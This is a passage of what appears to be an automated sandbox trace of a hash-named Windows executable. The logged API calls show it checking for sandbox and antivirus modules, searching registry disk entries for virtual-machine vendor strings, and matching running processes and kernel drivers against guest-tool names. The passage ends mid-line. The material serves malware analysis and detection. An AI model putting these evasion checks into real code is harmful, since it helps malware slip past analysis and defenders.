"\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 362 start_va = 0x76cb0000 end_va = 0x76cf3fff monitored = 0 entry_point = 0x76cc9d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 363 start_va = 0x76c00000 end_va = 0x76cacfff monitored = 0 entry_point = 0x76c14f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 364 start_va = 0x73f00000 end_va = 0x73f1dfff monitored = 0 entry_point = 0x73f0b640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 365 start_va = 0x73ef0000 end_va = 0x73ef9fff monitored = 0 entry_point = 0x73ef2a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 366 start_va = 0x76840000 end_va = 0x76897fff monitored = 0 entry_point = 0x768825c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 367 start_va = 0x430000 end_va = 0x43ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000430000" filename = "" Region: id = 368 start_va = 0x74eb0000 end_va = 0x762aefff monitored = 0 entry_point = 0x7506b990 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 369 start_va = 0x76800000 end_va = 0x76836fff monitored = 0 entry_point = 0x76803b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\SysWOW64\\cfgmgr32.dll" (normalized: "c:\\windows\\syswow64\\cfgmgr32.dll") Region: id = 370 start_va = 0x745b0000 end_va = 0x74aa8fff monitored = 0 entry_point = 0x747b7610 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 371 start_va = 0x762b0000 end_va = 0x7646cfff monitored = 0 entry_point = 0x76392a10 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 372 start_va = 0x76d00000 end_va = 0x76d44fff monitored = 0 entry_point = 0x76d1de90 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 373 start_va = 0x76d50000 end_va = 0x76d5bfff monitored = 0 entry_point = 0x76d53930 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 374 start_va = 0x74520000 end_va = 0x745acfff monitored = 0 entry_point = 0x74569b90 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 375 start_va = 0x76470000 end_va = 0x764b3fff monitored = 0 entry_point = 0x76477410 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 376 start_va = 0x73f20000 end_va = 0x73f2efff monitored = 0 entry_point = 0x73f22e40 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 377 start_va = 0x1db0000 end_va = 0x1eaffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001db0000" filename = "" Region: id = 378 start_va = 0x1eb0000 end_va = 0x202afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 379 start_va = 0x2030000 end_va = 0x212ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002030000" filename = "" Region: id = 380 start_va = 0x440000 end_va = 0x445fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000440000" filename = "" Region: id = 381 start_va = 0x450000 end_va = 0x454fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000450000" filename = "" Region: id = 785 start_va = 0x460000 end_va = 0x475fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000460000" filename = "" Thread: id = 3 os_tid = 0xc98 [0076.253] RtlInitUnicodeString (in: DestinationString=0x19ff4c, SourceString="kernel32" | out: DestinationString="kernel32") [0076.253] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="kernel32", BaseAddress=0x19ff54 | out: BaseAddress=0x19ff54*=0x76720000) returned 0x0 [0076.253] RtlInitUnicodeString (in: DestinationString=0x19ff4c, SourceString="user32" | out: DestinationString="user32") [0076.253] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="user32", BaseAddress=0x19ff54 | out: BaseAddress=0x19ff54*=0x743d0000) returned 0x0 [0076.306] RtlInitUnicodeString (in: DestinationString=0x19ff4c, SourceString="advapi32" | out: DestinationString="advapi32") [0076.306] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="advapi32", BaseAddress=0x19ff54 | out: BaseAddress=0x19ff54*=0x76600000) returned 0x0 [0077.652] RtlInitUnicodeString (in: DestinationString=0x19ff4c, SourceString="shell32" | out: DestinationString="shell32") [0077.652] LdrLoadDll (in: SearchPath=0x0, LoadFlags=0x0, Name="shell32", BaseAddress=0x19ff54 | out: BaseAddress=0x19ff54*=0x74eb0000) returned 0x0 [0084.816] GetKeyboardLayoutList (in: nBuff=0, lpList=0x0 | out: lpList=0x0) returned 1 [0084.816] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x179e0 [0084.816] GetKeyboardLayoutList (in: nBuff=1, lpList=0x179e0 | out: lpList=0x179e0) returned 1 [0084.817] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x19fb0c | out: TokenHandle=0x19fb0c*=0x150) returned 1 [0084.817] GetTokenInformation (in: TokenHandle=0x150, TokenInformationClass=0x19, TokenInformation=0x19fb10, TokenInformationLength=0x14, ReturnLength=0x19fb08 | out: TokenInformation=0x19fb10, ReturnLength=0x19fb08) returned 1 [0084.817] ExpandEnvironmentStringsW (in: lpSrc="%systemroot%\\system32\\ntdll.dll", lpDst=0x19fd4c, nSize=0x104 | out: lpDst="C:\\Windows\\system32\\ntdll.dll") returned 0x1e [0084.817] CreateFileW (lpFileName="C:\\Windows\\system32\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x154 [0084.818] CreateFileMappingW (hFile=0x154, lpFileMappingAttributes=0x0, flProtect=0x1000002, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x158 [0084.818] MapViewOfFile (hFileMappingObject=0x158, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x1eb0000 [0084.821] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19fd50, nSize=0x104 | out: lpFilename="C:\\Users\\RDhJ0CNFevzX\\Desktop\\22eae9c51337fd8dc6d1bb281a6e1ddb9990d906076cb3e1d89887eadbdfd374.exe" (normalized: "c:\\users\\rdhj0cnfevzx\\desktop\\22eae9c51337fd8dc6d1bb281a6e1ddb9990d906076cb3e1d89887eadbdfd374.exe")) returned 0x62 [0084.821] wcsstr (_Str="C:\\Users\\RDhJ0CNFevzX\\Desktop\\22eae9c51337fd8dc6d1bb281a6e1ddb9990d906076cb3e1d89887eadbdfd374.exe", _SubStr="7869.vmt") returned 0x0 [0084.821] NtQuerySystemInformation (in: SystemInformationClass=0x67, SystemInformation=0x19ff4c, Length=0x8, ResultLength=0x0 | out: SystemInformation=0x19ff4c, ResultLength=0x0) returned 0x0 [0084.822] NtQueryInformationProcess (in: ProcessHandle=0xffffffff, ProcessInformationClass=0x7, ProcessInformation=0x19ff54, ProcessInformationLength=0x4, ReturnLength=0x0 | out: ProcessInformation=0x19ff54, ReturnLength=0x0) returned 0x0 [0084.822] GetModuleHandleA (lpModuleName="sbiedll") returned 0x0 [0084.822] GetModuleHandleA (lpModuleName="aswhook") returned 0x0 [0084.822] GetModuleHandleA (lpModuleName="snxhk") returned 0x0 [0084.822] LocalAlloc (uFlags=0x40, uBytes=0x104) returned 0x19d98 [0084.822] lstrcatW (in: lpString1="", lpString2="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE" | out: lpString1="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE") returned="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE" [0084.822] RtlInitUnicodeString (in: DestinationString=0x19ff20, SourceString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE" | out: DestinationString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE") [0084.822] NtOpenKey (in: KeyHandle=0x19ff40, DesiredAccess=0x9, ObjectAttributes=0x19ff28*(Length=0x18, RootDirectory=0x0, ObjectName="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\IDE", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: KeyHandle=0x19ff40*=0x0) returned 0xc0000034 [0084.823] LocalFree (hMem=0x19d98) returned 0x0 [0084.823] LocalAlloc (uFlags=0x40, uBytes=0x104) returned 0x19d98 [0084.823] lstrcatW (in: lpString1="", lpString2="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI" | out: lpString1="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI") returned="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI" [0084.823] RtlInitUnicodeString (in: DestinationString=0x19ff20, SourceString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI" | out: DestinationString="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI") [0084.823] NtOpenKey (in: KeyHandle=0x19ff40, DesiredAccess=0x9, ObjectAttributes=0x19ff28*(Length=0x18, RootDirectory=0x0, ObjectName="\\REGISTRY\\MACHINE\\System\\CurrentControlSet\\Enum\\SCSI", Attributes=0x40, SecurityDescriptor=0x0, SecurityQualityOfService=0x0) | out: KeyHandle=0x19ff40*=0x15c) returned 0x0 [0084.823] NtQueryKey (in: KeyHandle=0x15c, KeyInformationClass=0x2, KeyInformation=0x0, Length=0x0, ResultLength=0x19ff48 | out: KeyInformation=0x0, ResultLength=0x19ff48) returned 0xc0000023 [0084.823] LocalAlloc (uFlags=0x40, uBytes=0x2c) returned 0x1a040 [0084.823] NtQueryKey (in: KeyHandle=0x15c, KeyInformationClass=0x2, KeyInformation=0x1a040, Length=0x2c, ResultLength=0x19ff48 | out: KeyInformation=0x1a040, ResultLength=0x19ff48) returned 0x0 [0084.823] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x19ff48 | out: KeyInformation=0x0, ResultLength=0x19ff48) returned 0xc0000023 [0084.824] LocalAlloc (uFlags=0x40, uBytes=0x4e) returned 0x19ea8 [0084.824] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x0, KeyInformationClass=0x0, KeyInformation=0x19ea8, Length=0x4e, ResultLength=0x19ff48 | out: KeyInformation=0x19ea8, ResultLength=0x19ff48) returned 0x0 [0084.824] wcsstr (_Str="cdrom&ven_asus&prod_drw-24f1st", _SubStr="qemu") returned 0x0 [0084.824] wcsstr (_Str="cdrom&ven_asus&prod_drw-24f1st", _SubStr="virtio") returned 0x0 [0084.824] wcsstr (_Str="cdrom&ven_asus&prod_drw-24f1st", _SubStr="vmware") returned 0x0 [0084.825] wcsstr (_Str="cdrom&ven_asus&prod_drw-24f1st", _SubStr="vbox") returned 0x0 [0084.825] wcsstr (_Str="cdrom&ven_asus&prod_drw-24f1st", _SubStr="xen") returned 0x0 [0084.825] LocalFree (hMem=0x19ea8) returned 0x0 [0084.825] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x1, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x19ff48 | out: KeyInformation=0x0, ResultLength=0x19ff48) returned 0xc0000023 [0084.825] LocalAlloc (uFlags=0x40, uBytes=0x44) returned 0x19ea8 [0084.825] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x1, KeyInformationClass=0x0, KeyInformation=0x19ea8, Length=0x44, ResultLength=0x19ff48 | out: KeyInformation=0x19ea8, ResultLength=0x19ff48) returned 0x0 [0084.826] wcsstr (_Str="cdrom&ven_hp&prod_ar629aa", _SubStr="qemu") returned 0x0 [0084.826] wcsstr (_Str="cdrom&ven_hp&prod_ar629aa", _SubStr="virtio") returned 0x0 [0084.826] wcsstr (_Str="cdrom&ven_hp&prod_ar629aa", _SubStr="vmware") returned 0x0 [0084.826] wcsstr (_Str="cdrom&ven_hp&prod_ar629aa", _SubStr="vbox") returned 0x0 [0084.826] wcsstr (_Str="cdrom&ven_hp&prod_ar629aa", _SubStr="xen") returned 0x0 [0084.827] LocalFree (hMem=0x19ea8) returned 0x0 [0084.827] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x2, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x19ff48 | out: KeyInformation=0x0, ResultLength=0x19ff48) returned 0xc0000023 [0084.827] LocalAlloc (uFlags=0x40, uBytes=0x46) returned 0x19ea8 [0084.827] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x2, KeyInformationClass=0x0, KeyInformation=0x19ea8, Length=0x46, ResultLength=0x19ff48 | out: KeyInformation=0x19ea8, ResultLength=0x19ff48) returned 0x0 [0084.828] wcsstr (_Str="cdrom&ven_lg&prod_gh24nsb0", _SubStr="qemu") returned 0x0 [0084.828] wcsstr (_Str="cdrom&ven_lg&prod_gh24nsb0", _SubStr="virtio") returned 0x0 [0084.828] wcsstr (_Str="cdrom&ven_lg&prod_gh24nsb0", _SubStr="vmware") returned 0x0 [0084.828] wcsstr (_Str="cdrom&ven_lg&prod_gh24nsb0", _SubStr="vbox") returned 0x0 [0084.828] wcsstr (_Str="cdrom&ven_lg&prod_gh24nsb0", _SubStr="xen") returned 0x0 [0084.828] LocalFree (hMem=0x19ea8) returned 0x0 [0084.828] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x3, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x19ff48 | out: KeyInformation=0x0, ResultLength=0x19ff48) returned 0xc0000023 [0084.828] LocalAlloc (uFlags=0x40, uBytes=0x50) returned 0x19ea8 [0084.828] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x3, KeyInformationClass=0x0, KeyInformation=0x19ea8, Length=0x50, ResultLength=0x19ff48 | out: KeyInformation=0x19ea8, ResultLength=0x19ff48) returned 0x0 [0084.829] wcsstr (_Str="cdrom&ven_samsung&prod_sh-224bb", _SubStr="qemu") returned 0x0 [0084.829] wcsstr (_Str="cdrom&ven_samsung&prod_sh-224bb", _SubStr="virtio") returned 0x0 [0084.829] wcsstr (_Str="cdrom&ven_samsung&prod_sh-224bb", _SubStr="vmware") returned 0x0 [0084.829] wcsstr (_Str="cdrom&ven_samsung&prod_sh-224bb", _SubStr="vbox") returned 0x0 [0084.829] wcsstr (_Str="cdrom&ven_samsung&prod_sh-224bb", _SubStr="xen") returned 0x0 [0084.830] LocalFree (hMem=0x19ea8) returned 0x0 [0084.830] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x4, KeyInformationClass=0x0, KeyInformation=0x0, Length=0x0, ResultLength=0x19ff48 | out: KeyInformation=0x0, ResultLength=0x19ff48) returned 0xc0000023 [0084.830] LocalAlloc (uFlags=0x40, uBytes=0x46) returned 0x19ea8 [0084.830] NtEnumerateKey (in: KeyHandle=0x15c, Index=0x4, KeyInformationClass=0x0, KeyInformation=0x19ea8, Length=0x46, ResultLength=0x19ff48 | out: KeyInformation=0x19ea8, ResultLength=0x19ff48) returned 0x0 [0084.831] wcsstr (_Str="disk&ven_&prod_st3160215as", _SubStr="qemu") returned 0x0 [0084.831] wcsstr (_Str="disk&ven_&prod_st3160215as", _SubStr="virtio") returned 0x0 [0084.831] wcsstr (_Str="disk&ven_&prod_st3160215as", _SubStr="vmware") returned 0x0 [0084.831] wcsstr (_Str="disk&ven_&prod_st3160215as", _SubStr="vbox") returned 0x0 [0084.831] wcsstr (_Str="disk&ven_&prod_st3160215as", _SubStr="xen") returned 0x0 [0084.831] LocalFree (hMem=0x19ea8) returned 0x0 [0084.832] LocalFree (hMem=0x1a040) returned 0x0 [0084.832] NtClose (Handle=0x15c) returned 0x0 [0084.832] LocalFree (hMem=0x19d98) returned 0x0 [0084.832] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x0, Length=0x0, ResultLength=0x19ff54 | out: SystemInformation=0x0, ResultLength=0x19ff54*=0x1c428) returned 0xc0000004 [0084.837] LocalAlloc (uFlags=0x40, uBytes=0x1d428) returned 0x1db2050 [0084.840] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1db2050, Length=0x1d428, ResultLength=0x19ff54 | out: SystemInformation=0x1db2050, ResultLength=0x19ff54*=0x15f68) returned 0x0 [0084.855] wcsstr (_Str="system", _SubStr="qemu-ga.exe") returned 0x0 [0084.855] wcsstr (_Str="system", _SubStr="qga.exe") returned 0x0 [0084.855] wcsstr (_Str="system", _SubStr="windanr.exe") returned 0x0 [0084.855] wcsstr (_Str="system", _SubStr="vboxservice.exe") returned 0x0 [0084.855] wcsstr (_Str="system", _SubStr="vboxtray.exe") returned 0x0 [0084.855] wcsstr (_Str="system", _SubStr="vmtoolsd.exe") returned 0x0 [0084.855] wcsstr (_Str="system", _SubStr="prl_tools.exe") returned 0x0 [0084.855] wcsstr (_Str="smss.exe", _SubStr="qemu-ga.exe") returned 0x0 [0084.856] wcsstr (_Str="smss.exe", _SubStr="qga.exe") returned 0x0 [0084.856] wcsstr (_Str="smss.exe", _SubStr="windanr.exe") returned 0x0 [0084.856] wcsstr (_Str="smss.exe", _SubStr="vboxservice.exe") returned 0x0 [0084.856] wcsstr (_Str="smss.exe", _SubStr="vboxtray.exe") returned 0x0 [0084.856] wcsstr (_Str="smss.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0084.856] wcsstr (_Str="smss.exe", _SubStr="prl_tools.exe") returned 0x0 [0084.856] wcsstr (_Str="csrss.exe", _SubStr="qemu-ga.exe") returned 0x0 [0084.856] wcsstr (_Str="csrss.exe", _SubStr="qga.exe") returned 0x0 [0084.856] wcsstr (_Str="csrss.exe", _SubStr="windanr.exe") returned 0x0 [0084.856] wcsstr (_Str="csrss.exe", _SubStr="vboxservice.exe") returned 0x0 [0084.856] wcsstr (_Str="csrss.exe", _SubStr="vboxtray.exe") returned 0x0 [0084.856] wcsstr (_Str="csrss.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0084.856] wcsstr (_Str="csrss.exe", _SubStr="prl_tools.exe") returned 0x0 [0084.857] wcsstr (_Str="wininit.exe", _SubStr="qemu-ga.exe") returned 0x0 [0084.857] wcsstr (_Str="wininit.exe", _SubStr="qga.exe") returned 0x0 [0084.857] wcsstr (_Str="wininit.exe", _SubStr="windanr.exe") returned 0x0 [0084.857] wcsstr (_Str="wininit.exe", _SubStr="vboxservice.exe") returned 0x0 [0084.857] wcsstr (_Str="wininit.exe", _SubStr="vboxtray.exe") returned 0x0 [0084.857] wcsstr (_Str="wininit.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0084.857] wcsstr (_Str="wininit.exe", _SubStr="prl_tools.exe") returned 0x0 [0084.858] wcsstr (_Str="csrss.exe", _SubStr="qemu-ga.exe") returned 0x0 [0084.858] wcsstr (_Str="csrss.exe", _SubStr="qga.exe") returned 0x0 [0084.858] wcsstr (_Str="csrss.exe", _SubStr="windanr.exe") returned 0x0 [0084.858] wcsstr (_Str="csrss.exe", _SubStr="vboxservice.exe") returned 0x0 [0084.858] wcsstr (_Str="csrss.exe", _SubStr="vboxtray.exe") returned 0x0 [0084.858] wcsstr (_Str="csrss.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0084.858] wcsstr (_Str="csrss.exe", _SubStr="prl_tools.exe") returned 0x0 [0084.858] wcsstr (_Str="winlogon.exe", _SubStr="qemu-ga.exe") returned 0x0 [0084.858] wcsstr (_Str="winlogon.exe", _SubStr="qga.exe") returned 0x0 [0084.858] wcsstr (_Str="winlogon.exe", _SubStr="windanr.exe") returned 0x0 [0084.858] wcsstr (_Str="winlogon.exe", _SubStr="vboxservice.exe") returned 0x0 [0084.858] wcsstr (_Str="winlogon.exe", _SubStr="vboxtray.exe") returned 0x0 [0084.858] wcsstr (_Str="winlogon.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0084.859] wcsstr (_Str="winlogon.exe", _SubStr="prl_tools.exe") returned 0x0 [0084.859] wcsstr (_Str="services.exe", _SubStr="qemu-ga.exe") returned 0x0 [0084.859] wcsstr (_Str="services.exe", _SubStr="qga.exe") returned 0x0 [0084.859] wcsstr (_Str="services.exe", _SubStr="windanr.exe") returned 0x0 [0084.859] wcsstr (_Str="services.exe", _SubStr="vboxservice.exe") returned 0x0 [0084.859] wcsstr (_Str="services.exe", _SubStr="vboxtray.exe") returned 0x0 [0084.859] wcsstr (_Str="services.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0084.859] wcsstr (_Str="services.exe", _SubStr="prl_tools.exe") returned 0x0 [0084.859] wcsstr (_Str="lsass.exe", _SubStr="qemu-ga.exe") returned 0x0 [0084.859] wcsstr (_Str="lsass.exe", _SubStr="qga.exe") returned 0x0 [0084.860] wcsstr (_Str="lsass.exe", _SubStr="windanr.exe") returned 0x0 [0084.860] wcsstr (_Str="lsass.exe", _SubStr="vboxservice.exe") returned 0x0 [0084.860] wcsstr (_Str="lsass.exe", _SubStr="vboxtray.exe") returned 0x0 [0084.860] wcsstr (_Str="lsass.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0084.860] wcsstr (_Str="lsass.exe", _SubStr="prl_tools.exe") returned 0x0 [0084.860] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0084.860] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0084.860] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0084.860] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0084.860] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0084.860] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0084.860] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0084.861] wcsstr (_Str="svchost.exe", _SubStr="qemu-ga.exe") returned 0x0 [0084.861] wcsstr (_Str="svchost.exe", _SubStr="qga.exe") returned 0x0 [0084.861] wcsstr (_Str="svchost.exe", _SubStr="windanr.exe") returned 0x0 [0084.861] wcsstr (_Str="svchost.exe", _SubStr="vboxservice.exe") returned 0x0 [0084.861] wcsstr (_Str="svchost.exe", _SubStr="vboxtray.exe") returned 0x0 [0084.861] wcsstr (_Str="svchost.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0084.861] wcsstr (_Str="svchost.exe", _SubStr="prl_tools.exe") returned 0x0 [0084.861] wcsstr (_Str="dwm.exe", _SubStr="qemu-ga.exe") returned 0x0 [0084.861] wcsstr (_Str="dwm.exe", _SubStr="qga.exe") returned 0x0 [0084.861] wcsstr (_Str="dwm.exe", _SubStr="windanr.exe") returned 0x0 [0084.861] wcsstr (_Str="dwm.exe", _SubStr="vboxservice.exe") returned 0x0 [0084.861] wcsstr (_Str="dwm.exe", _SubStr="vboxtray.exe") returned 0x0 [0084.861] wcsstr (_Str="dwm.exe", _SubStr="vmtoolsd.exe") returned 0x0 [0084.862] wcsstr (_Str="dwm.exe", _SubStr="prl_tools.exe") returned 0x0 [0084.863] LocalFree (hMem=0x1db2050) returned 0x0 [0084.863] NtQuerySystemInformation (in: SystemInformationClass=0xb, SystemInformation=0x0, Length=0x0, ResultLength=0x19ff54 | out: SystemInformation=0x0, ResultLength=0x19ff54*=0x991c) returned 0xc0000004 [0084.864] LocalAlloc (uFlags=0x40, uBytes=0xa91c) returned 0x1db2050 [0084.864] NtQuerySystemInformation (in: SystemInformationClass=0xb, SystemInformation=0x1db2050, Length=0xa91c, ResultLength=0x19ff54 | out: SystemInformation=0x1db2050, ResultLength=0x19ff54*=0x991c) returned 0x0 [0084.865] strstr (_Str="ntoskrnl.exe", _SubStr="vmci.s") returned 0x0 [0084.865] strstr (_Str="ntoskrnl.exe", _SubStr="vmusbm") returned 0x0 [0084.865] strstr (_Str="ntoskrnl.exe", _SubStr="vmmous") returned 0x0 [0084.865] strstr (_Str="ntoskrnl.exe", _SubStr="vm3dmp") returned 0x0 [0084.865] strstr (_Str="ntoskrnl.exe", _SubStr="vmrawd") returned 0x0 [0084.865] strstr (_Str="ntoskrnl.exe", _SubStr="vmmemc") returned 0x0 [0084.865] strstr (_Str="ntoskrnl.exe", _SubStr="vboxgu") returned 0x0 [0084.865] strstr (_Str="ntoskrnl.exe", _SubStr="vboxsf") returned 0x0 [0084.865] strstr (_Str="ntoskrnl.exe", _SubStr="vboxmo") returned 0x0 [0084.865] strstr (_Str="ntoskrnl.exe", _SubStr="vboxvi") returned 0x0 [0084.865] strstr (_Str="ntoskrnl.exe", _SubStr="vboxdi") returned 0x0 [0084.865] strstr (_Str="ntoskrnl.exe", _SubStr="vioser") returned 0x0 [0084.865] strstr (_Str="hal.dll", _SubStr="vmci.s") returned 0x0 [0084.865] strstr (_Str="hal.dll", _SubStr="vmusbm") returned 0x0 [0084.865] strstr (_Str="hal.dll", _SubStr="vmmous") returned 0x0 [0084.865] strstr (_Str="hal.dll", _SubStr="vm3dmp") returned 0x0 [0084.865] strstr (_Str="hal.dll", _SubStr="vmrawd") returned 0x0 [0084.866] strstr (_Str="hal.dll", _SubStr="vmmemc") returned 0x0 [0084.866] strstr (_Str="hal.dll", _SubStr="vboxgu") returned 0x0 [0084.866] strstr (_Str="hal.dll", _SubStr="vboxsf") returned 0x0 [0084.866] strstr (_Str="hal.dll", _SubStr="vboxmo") returned 0x0 [0084.866] strstr (_Str="hal.dll", _SubStr="vboxvi") returned 0x0 [0084.866] strstr (_Str="hal.dll", _SubStr="vboxdi") returned 0x0 [0084.866] strstr (_Str="hal.dll", _SubStr="vioser") returned 0x0 [0084.866] strstr (_Str="kd.dll", _SubStr="vmci.s") returned 0x0 [0084.866] strstr (_Str="kd.dll", _SubStr="vmusbm") returned 0x0 [0084.866] strstr (_Str="kd.dll", _SubStr="vmmous") returned 0x0 [0084.866] strstr (_Str="kd.dll", _SubStr="vm3dmp") returned 0x0 [0084.866] strstr (_Str="kd.dll", _SubStr="vmrawd") returned 0x0 [0084.866] strstr (_Str="kd.dll", _SubStr="vmmemc") returned 0x0 [0084.866] strstr (_Str="kd.dll", _SubStr="vboxgu") returned 0x0 [0084.866] strstr (_Str="kd.dll", _SubStr="vboxsf") returned 0x0 [0084.866] strstr (_Str="kd.dll", _SubStr="vboxmo") returned 0x0 [0084.866] strstr (_Str="kd.dll", _SubStr="vboxvi") returned 0x0 [0084.866] strstr (_Str="kd.dll", _SubStr="vboxdi") returned 0x0 [0084.866] strstr (_Str="kd.dll", _SubStr="vioser") returned 0x0 [0084.867] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmci.s") returned 0x0 [0084.867] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmusbm") returned 0x0 [0084.867] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmmous") returned 0x0 [0084.867] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vm3dmp") returned 0x0 [0084.867] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmrawd") returned 0x0 [0084.867] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vmmemc") returned 0x0 [0084.867] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxgu") returned 0x0 [0084.867] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxsf") returned 0x0 [0084.867] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxmo") returned 0x0 [0084.867] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxvi") returned 0x0 [0084.867] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vboxdi") returned 0x0 [0084.867] strstr (_Str="mcupdate_genuineintel.dll", _SubStr="vioser") returned 0x0 [0084.868] strstr (_Str="werkernel.sys", _SubStr="vmci.s") returned 0x0 [0084.868] strstr (_Str="werkernel.sys", _SubStr="vmusbm") returned 0x0 [0084.868] strstr (_Str="werkernel.sys", _SubStr="vmmous") returned 0x0 [0084.868] strstr (_Str="werkernel.sys", _SubStr="vm3dmp") returned 0x0 [0084.868] strstr (_Str="werkernel.sys", 